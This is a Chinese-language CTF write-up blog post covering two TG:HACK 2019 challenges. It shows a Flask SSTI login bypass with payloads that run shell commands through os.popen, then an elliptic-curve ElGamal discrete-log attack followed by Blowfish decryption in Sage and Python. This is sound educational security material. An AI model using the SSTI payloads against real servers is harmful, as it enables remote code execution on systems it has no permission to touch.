

Automne's Shadow.

TG:HACK CTF 2019 UnSolved WriteUp

Automne's Shadow.

TG:HACK CTF 2019 UnSolved WriteUp

flask ssti ecc

 2019/04/25   Share

• 
• 
• 
• 
• 

Crypto Web

挑了几道比赛时不会做的题，分析总结一下。

Wizardschat

提供了一个网站，直接登录会提示没有使用magic，抓包可以看到body里有个has_magic的子段，将其设置为1即可绕过。

登录后是一个类似于留言板的界面

将输入抓包修改为畸形数据

可以看到报错如下图，搜索报错的内容就可以定位到这是Flask框架

Flask框架是存在服务端模板注入(SSTI)漏洞的

经测试发现，登录的用户名位置可以解析类似16这样的代码为16

那么参考下面网址里的poc查看当前用户：
https://github.com/vulhub/vulhub/tree/master/flask/ssti

在用户登录的位置输入下面的脚本：

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

注意同时抓包修改has_magic=1

即可执行id命令

使用下面的payload可以读取flag

{{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('cat flag.txt').read()")}}

The Chamber of Secrets

感谢大佬分享：https://github.com/diogoaj/ctf-writeups/tree/master/2019/tghack/crypto/TheChamberOfSecrets

题目给了两部分内容：

public(h, a, b, q, g)
h = (829999038570486 : 549144410878897 : 1)
a = -3
b = 313205882961673
q = 1125899906842597
g = (1115545019992514 : 78178829836422 : 1)
c = ((700253548714057 : 421820716153583 : 1), (470712751668926 : 131989609316847 : 1))

sTokhflo9WHPQB8JHEm0OVG2SwUA/sHaP0yFv9T2kmoZjC5g46eeRM8M8CGRj8bV/NxY4VJ8Ls0=

第一部分内容给了很多参数，符合椭圆曲线密码的特点，尤其是最后的c提供了两组数据，这在ElGamal密码体制里是非常典型的密文提供形式，注意椭圆曲线密码就是基于ElGamal密码体制，该体制的鲁棒性就依赖于离散对数难题。

key =  SHA256.new()
key.update(secret)

def bf_encrypt(key, message):
    bs = Blowfish.block_size
    iv = Random.new().read(bs)
    cipher = Blowfish.new(key, Blowfish.MODE_CBC, iv)
    pad_len = bs - divmod(len(message), bs)[1]
    padding = [pad_len]*pad_len
    padding = pack('b'*pad_len, *padding)
    return base64.b64encode(iv + cipher.encrypt(message + padding))

第二部分则是给了一段Blowfish的加密算法，加密后的明文应该就是第一部分的最后一行：

sTokhflo9WHPQB8JHEm0OVG2SwUA/sHaP0yFv9T2kmoZjC5g46eeRM8M8CGRj8bV/NxY4VJ8Ls0=

但是key未知，明显是要通过第一部分获取。

椭圆曲线密码学还是挺难描述的，我目前也是似懂非懂。
举个例子：
对Z_p上的椭圆曲线，变元和系数均在Z_p中取值：

y² mod p = (x³+ax+b) mod p

那么，当a = 1, b = 1, x = 9, y = 7, p = 23时就可以满足上面的方程式。

在椭圆曲线密码学里，q为素数p或者形为2^m的整数，就可以定义出E_q(a,b)，上面的一组解就被定义成点G = (9,7)，并且公钥P = n * G ，其中n为私钥。

那么就可以和第一部分对号入座了。

其中h为公钥，g为一组解，那么由 h = n * G，可离散对数求得私钥n

然后根据提供的两组密文就可以还原明文。

C’ = c1*n
M = c2 - C’

使用sage是可以计算的，直接用参考链接里的脚本：

## ElGamal Elliptic Curve decryption

a = -3
b = 313205882961673
q = 1125899906842597

E = EllipticCurve(Zmod(q), [a, b])

g = E(1115545019992514, 78178829836422)
h = E(829999038570486, 549144410878897)
c1 = E(700253548714057, 421820716153583)
c2 = E(470712751668926, 131989609316847)

x = g.discrete_log(h)

print "[+] x:", x

C_ = c1*x
M = c2 - C_

print "[+] key:", M[0]

还是要运算两三分钟时间的，得到：

root@automne:/Pentest/CTF# sage ecc.sage 
[+] x: 29131765433887
[+] key: 934013602642177

然后使用下面的解密脚本：

from Crypto.Cipher import Blowfish
from Crypto.Hash import SHA256
import base64

b = "sTokhflo9WHPQB8JHEm0OVG2SwUA/sHaP0yFv9T2kmoZjC5g46eeRM8M8CGRj8bV/NxY4VJ8Ls0="

key =  SHA256.new()

# Insert key here
key.update(b"934013602642177")

def bf_encrypt(key, message):  
    bs = Blowfish.block_size  
    iv = Random.new().read(bs)  
    cipher = Blowfish.new(key, Blowfish.MODE_CBC, iv)  
    pad_len = bs - divmod(len(message), bs)[1]  
    padding = [pad_len]*pad_len  
    padding = pack('b'*pad_len, *padding)  
    return base64.b64encode(iv + cipher.encrypt(message + padding))  

def decrypt(key, message):
	enc = base64.b64decode(message)
	iv = enc[:Blowfish.block_size]
	cipher = Blowfish.new(key, Blowfish.MODE_CBC, iv)
	return cipher.decrypt(enc[Blowfish.block_size:])

print(decrypt(key.digest(), b))

解密后得到flag：

原文作者: Automne

原文链接: https://ce-automne.github.io/2019/04/25/TGHACK-CTF-2019-UnSolved-WriteUp/

发表日期: April 25th 2019, 9:25:00 pm

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  Plaid CTF 2019 Project Eulernt WriteUp
• Previous Post
  ASIS CTF 2019 A delicious soup WriteUp

Powered by Hexotheme Archer

本站总访问量PV: 次 :)

CATALOG

1. 1. Wizardschat
2. 2. The Chamber of Secrets



• Archive
• Tag
• Cate

Total : 62

2021

• 01/23拿到CAS单点登录的ticket真的就可以为所欲为了吗

2020

• 08/23Shiro 1.2.4反序列化漏洞分析和利用
• 07/19TSG CTF 2020 Beginner's Crypto WriteUp
• 07/18Tomcat Session反序列化漏洞CVE-2020-9484分析
• 06/11Paillier Cryptosystem对应的问题解析
• 02/16RSA LSB Oracle攻击原理分析
• 02/11Log4j反序列化漏洞分析
• 02/08Java SPI机制与SnakeYaml反序列化漏洞
• 02/04WebGoat8.0 SQL Injection问题分析
• 01/28WebGoat8.0 Insecure Deserialization问题分析
• 01/26LCG和模p平方根结合的题目
• 01/18IDEA Community 创建Java Servlet项目

2019

• 12/26FastJson 1.2.47 Deserialization Debug
• 12/22watevr CTF 2019 Crypto WriteUp
• 12/22UTC CTF 2019 Crypto WriteUp
• 12/10FastJson 1.2.24 Deserialization Debug
• 12/07RMI && Fastjson 1.2.47 RCE Review
• 11/23Weblogic CVE-2019-2647 XXE Vulnerability Review
• 11/16Apache Commons Collections Deserialization Review
• 11/09RedPwnCTF 2019 blueprint WriteUp
• 07/25HWCTF Mobile WriteUp
• 07/20CBC MAC Forgery Conclusion
• 07/14XMAN CTF Crypto WriteUp
• 07/14CBC Bit-Flipping Attack Conclusion Part2
• 07/05ISITDTU CTF 2019 WriteUp Part2
• 07/02ISITDTU CTF 2019 WriteUp
• 07/01RCTF 2019 BabyCrypto WriteUp
• 06/26Hash Length Extension Attack Conclusion
• 06/23CBC Padding Oracle Attack Conclusion
• 06/15HSCTF 2019 UnSolved WriteUp
• 06/06HSCTF 2019 SuperSecureSystem WriteUp
• 05/23CBC Bit-Flipping Attack Conclusion
• 05/19LFSR in Crypto Conclusion
• 05/18CSAW CTF 2017 BabyCrypt WriteUp
• 05/18CTF 313 2019 Angle of Approach WriteUp
• 05/05UUTCTF 2019 Solve the Crypto WriteUp
• 04/27SECCONCTF 2017 Very Smooth WriteUp
• 04/27Plaid CTF 2019 Project Eulernt WriteUp
• 04/25TG:HACK CTF 2019 UnSolved WriteUp
• 04/23ASIS CTF 2019 A delicious soup WriteUp
• 04/21TG:HACK CTF 2019 Solved WriteUp
• 04/19RadarCTF 2019 Crypto WriteUp
• 04/18HackZone CTF 2019 MeSS WriteUp
• 04/110CTF 2019 zer0lfsr WriteUp
• 04/110CTF 2019 babyrsa WriteUp
• 03/27CONFidence CTF 2019 The Lottery WriteUp
• 03/21MySQL Blind Injection Scripts
• 03/14TAMU CTF 2019 LocalNews WriteUp
• 03/12BSidesSF CTF 2019 GoodLuks WriteUp
• 03/10BSidesSF CTF 2019 WeatherCompanion WriteUp
• 03/07BSidesSF CTF 2019 Sequel WriteUp
• 03/05BSidesSF CTF 2017 FlagStore WriteUp
• 03/03BSidesSF CTF 2017 Pinlock WriteUp
• 02/24BSidesSF CTF 2018 PasswordVault WriteUp

2018

• 12/23XMAS CTF 2018 ChristmasGame WriteUp
• 12/14OtterCTF 2018 Forensics WriteUp Part 2
• 12/13OtterCTF 2018 Forensics WriteUp Part 1
• 09/24CSAW CTF 2018 No Vulnerable Services WriteUp
• 09/19CSAW CTF 2018 SSO WriteUp
• 08/23WhiteHat Grand Prix 2018 Misc02 WriteUp
• 08/05CTFZone 2018 Never ever be fooled to pay the ransomware! WriteUp

2017

• 01/24SQL Injections with SQLi Labs WriteUp I

lfsr z3 python reverse fat git broadcastreceiver sha-1 cbc sqli sqlite golang race condition luks hashcat photorec MAC sso oauth 2.0 padding oracle csp xss abe vdex ransomware frida ndk pwntools hashpumpy sourceleakhacker ecb socat fastjson JdbcRowsetImpl idea servlet volatility inet_aton boneh durfee lcg rabin egcd cipolla's algorithm spi snakeyaml ScriptEngineManager malware codereflect mysql yara plugin deserialization log4j rsa binary javascript prototype pollution nodejs shiro ysoserial primefac rsatool ssl AES tshark gmpy2 RsaCtfTool Hex flask ssti ecc Modular operation WebGoat8 order by tomcat nim game .iso gpg outguess sage google cloud sdk zsteg base58 fermat multi-primes prng rmi jndi Paillier Cryptosystem rsa lsb oracle SQL Injection ping delay xor CAS 单点登录 渗透测试 weblogic xxe reflect 010 editor gcd



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

Crypto Android Web Forensics Misc

